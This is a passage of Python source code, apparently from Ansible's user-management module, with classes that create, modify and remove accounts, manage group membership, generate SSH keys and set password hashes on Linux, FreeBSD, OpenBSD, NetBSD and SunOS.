self.module.debug('In check mode, would have run: "%s"' % cmd)
return (0, '', '')
else:
# cast all args to strings ansible-modules-core/issues/4397
cmd = [str(x) for x in cmd]
return self.module.run_command(cmd, use_unsafe_shell=use_unsafe_shell, data=data)
def backup_shadow(self):
if not self.module.check_mode and self.SHADOWFILE:
return self.module.backup_local(self.SHADOWFILE)
def remove_user_userdel(self):
if self.local:
command_name = 'luserdel'
else:
command_name = 'userdel'
cmd = [self.module.get_bin_path(command_name, True)]
if self.force:
cmd.append('-f')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self):
if self.local:
command_name = 'luseradd'
else:
command_name = 'useradd'
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.seuser is not None:
cmd.append('-Z')
cmd.append(self.seuser)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
elif self.group_exists(self.name):
# use the -N option (no user group) if a group already
# exists with the same name as the user to prevent
# errors from useradd trying to create a group when
# USERGROUPS_ENAB is set in /etc/login.defs.
if os.path.exists('/etc/redhat-release'):
dist = distro.linux_distribution(full_distribution_name=False)
major_release = int(dist[1].split('.')[0])
if major_release <= 5:
cmd.append('-n')
else:
cmd.append('-N')
elif os.path.exists('/etc/SuSE-release'):
# -N did not exist in useradd before SLE 11 and did not
# automatically create a group
dist = distro.linux_distribution(full_distribution_name=False)
major_release = int(dist[1].split('.')[0])
if major_release >= 12:
cmd.append('-N')
else:
cmd.append('-N')
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.expires is not None:
cmd.append('-e')
if self.expires < time.gmtime(0):
cmd.append('')
else:
cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
if not self.local:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def _check_usermod_append(self):
# check if this version of usermod can append groups
if self.local:
command_name = 'lusermod'
else:
command_name = 'usermod'
usermod_path = self.module.get_bin_path(command_name, True)
# for some reason, usermod --help cannot be used by non root
# on RH/Fedora, due to lack of execute bit for others
if not os.access(usermod_path, os.X_OK):
return False
cmd = [usermod_path, '--help']
(rc, data1, data2) = self.execute_command(cmd, obey_checkmode=False)
helpout = data1 + data2
# check if --append exists
lines = to_native(helpout).split('\n')
for line in lines:
if line.strip().startswith('-a, --append'):
return True
return False
def modify_user_usermod(self):
if self.local:
command_name = 'lusermod'
else:
command_name = 'usermod'
cmd = [self.module.get_bin_path(command_name, True)]
info = self.user_info()
has_append = self._check_usermod_append()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
# get a list of all groups for the user, including the primary
current_groups = self.user_group_membership(exclude_primary=False)
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
if has_append:
cmd.append('-a')
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if self.append and not has_append:
cmd.append('-A')
cmd.append(','.join(group_diff))
else:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.expires is not None:
current_expires = int(self.user_password()[1])
if self.expires < time.gmtime(0):
if current_expires >= 0:
cmd.append('-e')
cmd.append('')
else:
# Convert days since Epoch to seconds since Epoch as struct_time
current_expire_date = time.gmtime(current_expires * 86400)
# Current expires is negative or we compare year, month, and day only
if current_expires < 0 or current_expire_date[:3] != self.expires[:3]:
cmd.append('-e')
cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
# Lock if no password or unlocked, unlock only if locked
if self.password_lock and not info[1].startswith('!'):
cmd.append('-L')
elif self.password_lock is False and info[1].startswith('!'):
# usermod will refuse to unlock a user with no password, module shows 'changed' regardless
cmd.append('-U')
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
def group_exists(self, group):
try:
# Try group as a gid first
grp.getgrgid(int(group))
return True
except (ValueError, KeyError):
try:
grp.getgrnam(group)
return True
except KeyError:
return False
def group_info(self, group):
if not self.group_exists(group):
return False
try:
# Try group as a gid first
return list(grp.getgrgid(int(group)))
except (ValueError, KeyError):
return list(grp.getgrnam(group))
def get_groups_set(self, remove_existing=True):
if self.groups is None:
return None
info = self.user_info()
groups = set(x.strip() for x in self.groups.split(',') if x)
for g in groups.copy():
if not self.group_exists(g):
self.module.fail_json(msg="Group %s does not exist" % (g))
if info and remove_existing and self.group_info(g)[2] == info[3]:
groups.remove(g)
return groups
def user_group_membership(self, exclude_primary=True):
''' Return a list of groups the user belongs to '''
groups = []
info = self.get_pwd_info()
for group in grp.getgrall():
if self.name in group.gr_mem:
# Exclude the user's primary group by default
if not exclude_primary:
groups.append(group[0])
else:
if info[3] != group.gr_gid:
groups.append(group[0])
return groups
def user_exists(self):
try:
if pwd.getpwnam(self.name):
return True
except KeyError:
return False
def get_pwd_info(self):
if not self.user_exists():
return False
return list(pwd.getpwnam(self.name))
def user_info(self):
if not self.user_exists():
return False
info = self.get_pwd_info()
if len(info[1]) == 1 or len(info[1]) == 0:
info[1] = self.user_password()[0]
return info
def user_password(self):
passwd = ''
expires = ''
if HAVE_SPWD:
try:
passwd = spwd.getspnam(self.name)[1]
expires = spwd.getspnam(self.name)[7]
return passwd, expires
except KeyError:
return passwd, expires
except OSError as e:
# Python 3.6 raises PermissionError instead of KeyError
# Due to absence of PermissionError in python2.7 need to check
# errno
if e.errno in (errno.EACCES, errno.EPERM):
return passwd, expires
raise
if not self.user_exists():
return passwd, expires
elif self.SHADOWFILE:
# Read shadow file for user's encrypted password string
if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
with open(self.SHADOWFILE, 'r') as f:
for line in f:
if line.startswith('%s:' % self.name):
passwd = line.split(':')[1]
expires = line.split(':')[self.SHADOWFILE_EXPIRE_INDEX] or -1
return passwd, expires
def get_ssh_key_path(self):
info = self.user_info()
if os.path.isabs(self.ssh_file):
ssh_key_file = self.ssh_file
else:
if not os.path.exists(info[5]) and not self.module.check_mode:
raise Exception('User %s home directory does not exist' % self.name)
ssh_key_file = os.path.join(info[5], self.ssh_file)
return ssh_key_file
def ssh_key_gen(self):
info = self.user_info()
overwrite = None
try:
ssh_key_file = self.get_ssh_key_path()
except Exception as e:
return (1, '', to_native(e))
ssh_dir = os.path.dirname(ssh_key_file)
if not os.path.exists(ssh_dir):
if self.module.check_mode:
return (0, '', '')
try:
os.mkdir(ssh_dir, int('0700', 8))
os.chown(ssh_dir, info[2], info[3])
except OSError as e:
return (1, '', 'Failed to create %s: %s' % (ssh_dir, to_native(e)))
if os.path.exists(ssh_key_file):
if self.force:
# ssh-keygen doesn't support overwriting the key interactively, so send 'y' to confirm
overwrite = 'y'
else:
return (None, 'Key already exists, use "force: yes" to overwrite', '')
cmd = [self.module.get_bin_path('ssh-keygen', True)]
cmd.append('-t')
cmd.append(self.ssh_type)
if self.ssh_bits > 0:
cmd.append('-b')
cmd.append(self.ssh_bits)
cmd.append('-C')
cmd.append(self.ssh_comment)
cmd.append('-f')
cmd.append(ssh_key_file)
if self.ssh_passphrase is not None:
if self.module.check_mode:
self.module.debug('In check mode, would have run: "%s"' % cmd)
return (0, '', '')
master_in_fd, slave_in_fd = pty.openpty()
master_out_fd, slave_out_fd = pty.openpty()
master_err_fd, slave_err_fd = pty.openpty()
env = os.environ.copy()
env['LC_ALL'] = 'C'
try:
p = subprocess.Popen([to_bytes(c) for c in cmd],
stdin=slave_in_fd,
stdout=slave_out_fd,
stderr=slave_err_fd,
preexec_fn=os.setsid,
env=env)
out_buffer = b''
err_buffer = b''
while p.poll() is None:
r, w, e = select.select([master_out_fd, master_err_fd], [], [], 1)
first_prompt = b'Enter passphrase (empty for no passphrase):'
second_prompt = b'Enter same passphrase again'
prompt = first_prompt
for fd in r:
if fd == master_out_fd:
chunk = os.read(master_out_fd, 10240)
out_buffer += chunk
if prompt in out_buffer:
os.write(master_in_fd, to_bytes(self.ssh_passphrase, errors='strict') + b'\r')
prompt = second_prompt
else:
chunk = os.read(master_err_fd, 10240)
err_buffer += chunk
if prompt in err_buffer:
os.write(master_in_fd, to_bytes(self.ssh_passphrase, errors='strict') + b'\r')
prompt = second_prompt
if b'Overwrite (y/n)?' in out_buffer or b'Overwrite (y/n)?' in err_buffer:
# The key was created between us checking for existence and now
return (None, 'Key already exists', '')
rc = p.returncode
out = to_native(out_buffer)
err = to_native(err_buffer)
except OSError as e:
return (1, '', to_native(e))
else:
cmd.append('-N')
cmd.append('')
(rc, out, err) = self.execute_command(cmd, data=overwrite)
if rc == 0 and not self.module.check_mode:
# If the keys were successfully created, we should be able
# to tweak ownership.
os.chown(ssh_key_file, info[2], info[3])
os.chown('%s.pub' % ssh_key_file, info[2], info[3])
return (rc, out, err)
def ssh_key_fingerprint(self):
ssh_key_file = self.get_ssh_key_path()
if not os.path.exists(ssh_key_file):
return (1, 'SSH Key file %s does not exist' % ssh_key_file, '')
cmd = [self.module.get_bin_path('ssh-keygen', True)]
cmd.append('-l')
cmd.append('-f')
cmd.append(ssh_key_file)
return self.execute_command(cmd, obey_checkmode=False)
def get_ssh_public_key(self):
ssh_public_key_file = '%s.pub' % self.get_ssh_key_path()
try:
with open(ssh_public_key_file, 'r') as f:
ssh_public_key = f.read().strip()
except IOError:
return None
return ssh_public_key
def create_user(self):
# by default we use the create_user_useradd method
return self.create_user_useradd()
def remove_user(self):
# by default we use the remove_user_userdel method
return self.remove_user_userdel()
def modify_user(self):
# by default we use the modify_user_usermod method
return self.modify_user_usermod()
def create_homedir(self, path):
if not os.path.exists(path):
if self.skeleton is not None:
skeleton = self.skeleton
else:
skeleton = '/etc/skel'
if os.path.exists(skeleton):
try:
shutil.copytree(skeleton, path, symlinks=True)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
else:
try:
os.makedirs(path)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
# get umask from /etc/login.defs and set correct home mode
if os.path.exists(self.LOGIN_DEFS):
with open(self.LOGIN_DEFS, 'r') as f:
for line in f:
m = re.match(r'^UMASK\s+(\d+)$', line)
if m:
umask = int(m.group(1), 8)
mode = 0o777 & ~umask
try:
os.chmod(path, mode)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
def chown_homedir(self, uid, gid, path):
try:
os.chown(path, uid, gid)
for root, dirs, files in os.walk(path):
for d in dirs:
os.chown(os.path.join(root, d), uid, gid)
for f in files:
os.chown(os.path.join(root, f), uid, gid)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
# ===========================================
class FreeBsdUser(User):
"""
This is a FreeBSD User manipulation class - it uses the pw command
to manipulate the user database, followed by the chpass command
to change the password.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'FreeBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
SHADOWFILE_EXPIRE_INDEX = 6
DATE_FORMAT = '%d-%b-%Y'
def remove_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'userdel',
'-n',
self.name
]
if self.remove:
cmd.append('-r')
return self.execute_command(cmd)
def create_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'useradd',
'-n',
self.name,
]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.expires is not None:
cmd.append('-e')
if self.expires < time.gmtime(0):
cmd.append('0')
else:
cmd.append(str(calendar.timegm(self.expires)))
# system cannot be handled currently - should we error if its requested?
# create the user
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
# we have to set the password in a second command
if self.password is not None:
cmd = [
self.module.get_bin_path('chpass', True),
'-p',
self.password,
self.name
]
return self.execute_command(cmd)
return (rc, out, err)
def modify_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'usermod',
'-n',
self.name
]
cmd_len = len(cmd)
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
if (info[5] != self.home and self.move_home) or (not os.path.exists(self.home) and self.create_home):
cmd.append('-m')
if info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
# find current login class
user_login_class = None
if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
with open(self.SHADOWFILE, 'r') as f:
for line in f:
if line.startswith('%s:' % self.name):
user_login_class = line.split(':')[4]
# act only if login_class change
if self.login_class != user_login_class:
cmd.append('-L')
cmd.append(self.login_class)
if self.groups is not None:
current_groups = self.user_group_membership()
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
groups_need_mod = False
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups = groups | set(current_groups)
cmd.append(','.join(new_groups))
if self.expires is not None:
current_expires = int(self.user_password()[1])
# If expiration is negative or zero and the current expiration is greater than zero, disable expiration.
# In OpenBSD, setting expiration to zero disables expiration. It does not expire the account.
if self.expires <= time.gmtime(0):
if current_expires > 0:
cmd.append('-e')
cmd.append('0')
else:
# Convert days since Epoch to seconds since Epoch as struct_time
current_expire_date = time.gmtime(current_expires)
# Current expires is negative or we compare year, month, and day only
if current_expires <= 0 or current_expire_date[:3] != self.expires[:3]:
cmd.append('-e')
cmd.append(str(calendar.timegm(self.expires)))
# modify the user if cmd will do anything
if cmd_len != len(cmd):
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
else:
(rc, out, err) = (None, '', '')
# we have to set the password in a second command
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd = [
self.module.get_bin_path('chpass', True),
'-p',
self.password,
self.name
]
return self.execute_command(cmd)
# we have to lock/unlock the password in a distinct command
if self.password_lock and not info[1].startswith('*LOCKED*'):
cmd = [
self.module.get_bin_path('pw', True),
'lock',
self.name
]
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
return self.execute_command(cmd)
elif self.password_lock is False and info[1].startswith('*LOCKED*'):
cmd = [
self.module.get_bin_path('pw', True),
'unlock',
self.name
]
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
return self.execute_command(cmd)
return (rc, out, err)
class DragonFlyBsdUser(FreeBsdUser):
"""
This is a DragonFlyBSD User manipulation class - it inherits the
FreeBsdUser class behaviors, such as using the pw command to
manipulate the user database, followed by the chpass command
to change the password.
"""
platform = 'DragonFly'
class OpenBSDUser(User):
"""
This is a OpenBSD User manipulation class.
Main differences are that OpenBSD:-
- has no concept of "system" account.
- has no force delete user
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'OpenBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.password is not None and self.password != '*':
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups_option = '-S'
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_option = '-G'
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append(groups_option)
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
# find current login class
user_login_class = None
userinfo_cmd = [self.module.get_bin_path('userinfo', True), self.name]
(rc, out, err) = self.execute_command(userinfo_cmd, obey_checkmode=False)
for line in out.splitlines():
tokens = line.split()
if tokens[0] == 'class' and len(tokens) == 2:
user_login_class = tokens[1]
# act only if login_class change
if self.login_class != user_login_class:
cmd.append('-L')
cmd.append(self.login_class)
if self.password_lock and not info[1].startswith('*'):
cmd.append('-Z')
elif self.password_lock is False and info[1].startswith('*'):
cmd.append('-U')
if self.update_password == 'always' and self.password is not None \
and self.password != '*' and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
class NetBSDUser(User):
"""
This is a NetBSD User manipulation class.
Main differences are that NetBSD:-
- has no concept of "system" account.
- has no force delete user
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'NetBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
if len(groups) > 16:
self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
cmd.append(self.name)
return self.execute_command(cmd)
def remove_user_userdel(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def modify_user(self):
cmd = [self.module.get_bin_path('usermod', True)]
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups = set(current_groups).union(groups)
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if len(groups) > 16:
self.module.fail_json(msg="Too many groups (%d) NetBSD allows for 16 max." % len(groups))
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
if self.password_lock and not info[1].startswith('*LOCKED*'):
cmd.append('-C yes')
elif self.password_lock is False and info[1].startswith('*LOCKED*'):
cmd.append('-C no')
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
class SunOS(User):
"""
This is a SunOS User manipulation class - The main difference between
this class and the generic user class is that Solaris-type distros
don't support the concept of a "system" account and we need to
edit the /etc/shadow file manually to set a password. (Ugh)
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
- user_info()
"""
platform = 'SunOS'
distribution = None
SHADOWFILE = '/etc/shadow'
USER_ATTR = '/etc/user_attr'
def get_password_defaults(self):
# Read password aging defaults
try:
minweeks = ''
maxweeks = ''
warnweeks = ''
with open("/etc/default/passwd", 'r') as f:
for line in f:
line = line.strip()
if (line.startswith('#') or line == ''):
continue
m = re.match(r'^([^#]*)#(.*)$', line)
if m: # The line contains a hash / comment
line = m.group(1)
key, value = line.split('=')
if key == "MINWEEKS":
minweeks = value.rstrip('\n')
elif key == "MAXWEEKS":
maxweeks = value.rstrip('\n')
elif key == "WARNWEEKS":
warnweeks = value.rstrip('\n')
except Exception as err:
self.module.fail_json(msg="failed to read /etc/default/passwd: %s" % to_native(err))
return (minweeks, maxweeks, warnweeks)
def remove_user(self):
cmd = [self.module.get_bin_path('userdel', True)]
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user(self):
cmd = [self.module.get_bin_path('useradd', True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
if self.profile is not None:
cmd.append('-P')
cmd.append(self.profile)
if self.authorization is not None:
cmd.append('-A')
cmd.append(self.authorization)
if self.role is not None:
cmd.append('-R')
cmd.append(self.role)
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
if not self.module.check_mode:
# we have to set the password by editing the /etc/shadow file
if self.password is not None:
self.backup_shadow()
minweeks, maxweeks, warnweeks = self.get_password_defaults()
try:
lines = []
with open(self.SHADOWFILE, 'rb') as f:
for line in f:
line = to_native(line, errors='surrogate_or_strict')
fields = line.strip().split(':')
if not fields[0] == self.name:
lines.append(line)
continue
fields[1] = self.password
fields[2] = str(int(time.time() // 86400))
if minweeks:
try:
fields[3] = str(int(minweeks) * 7)
except ValueError:
# mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
pass
if maxweeks:
try:
fields[4] = str(int(maxweeks) * 7)
except ValueError:
# mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
pass
if warnweeks:
try:
fields[5] = str(int(warnweeks) * 7)
except ValueError:
# mirror solaris, which allows for any value in this field, and ignores anything that is not an int.
pass
line = ':'.join(fields)
lines.append('%s\n' % line)
with open(self.SHADOWFILE, 'w+') as f:
f.writelines(lines)
except Exception as err:
self.module.fail_json(msg="failed to update users password: %s" % to_native(err))
return (rc, out, err)
def modify_user_usermod(self):
cmd = [self.module.get_bin_path('usermod', True)]
cmd_len = len(cmd)
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
current_groups = self.user_group_membership()
groups = self.get_groups_set()
group_diff = set(current_groups).symmetric_difference(groups)
groups_need_mod = False
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
cmd.append('-G')
new_groups = groups
if self.append:
new_groups.update(current_groups)
cmd.append(','.join(new_groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
if self.move_home:
cmd.append('-m')
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.profile is not None and info[7] != self.profile:
cmd.append('-P')
cmd.append(self.profile)
if self.authorization is not None and info[8] != self.authorization:
cmd.append('-A')
cmd.append(self.authorization)
if self.role is not None and info[9] != self.role:
cmd.append('-R')
cmd.append(self.role)
# modify the user if cmd will do anything
if cmd_len != len(cmd):
cmd.append(self.name)
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
else:
(rc, out, err) = (None, '', '')
# we have to set the password by editing the /etc/shadow file
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
self.backup_shadow()
(rc, out, err) = (0, '', '')
if not self.module.check_mode:
minweeks, maxweeks, warnweeks = self.get_password_defaults()
try:
lines = []
with open(self.SHADOWFILE, 'rb') as f:
for line in f:
line = to_native(line, errors='surrogate_or_strict')
fields = line.strip().split(':')
if not fields[0] == self.name:
lines.append(line)
continue
fields[1] = self.password
fields[2] = str(int(time.time() // 86400))
if minweeks:
fields[3] = str(int(minweeks) * 7)
if maxweeks:
fields[4] = str(int(maxweeks) * 7)
if warnweeks:
fields[5] = str(int(warnweeks) * 7)
line = ':'.join(fields)
lines.append('%s\n' % line)
with open(self.SHADOWFILE, 'w+') as f:
f.writelines(lines)
rc = 0
except Exception as err:
self.module.fail_json(msg="failed to update users password: %s" % to_native(err))
return (rc, out, err)
def user_info(self):
info = super(SunOS, self).user_info()
if info:
info += self._user_attr_info()
return info
def _user_attr_info(self):
info = [''] * 3
with open(self.USER_ATTR, 'r') as file_handler:
for line in file_handler:
lines = line.strip().split('::::')
if lines[0] == self.name:
tmp = dict(x.split('=') for x in lines[1].split(';'))
info[0] = tmp.get('profiles', '')
info[1] = tmp.get('auths', '')
info[2] = tmp.get('roles', '')
return info
class DarwinUser(User):
"""
This is a Darwin macOS User manipulation class.
Main differences are that Darwin:-
- Handles accounts in a database managed by dscl(1)
- Has no useradd/groupadd
- Does not create home directories
- User password must be cleartext
- UID must be given
- System users must ben under 500
This overrides the following methods from the generic class:-
- user_exists()
- create_user()
- remove_user()
- modify_user()
"""
platform = 'Darwin'
distribution = None
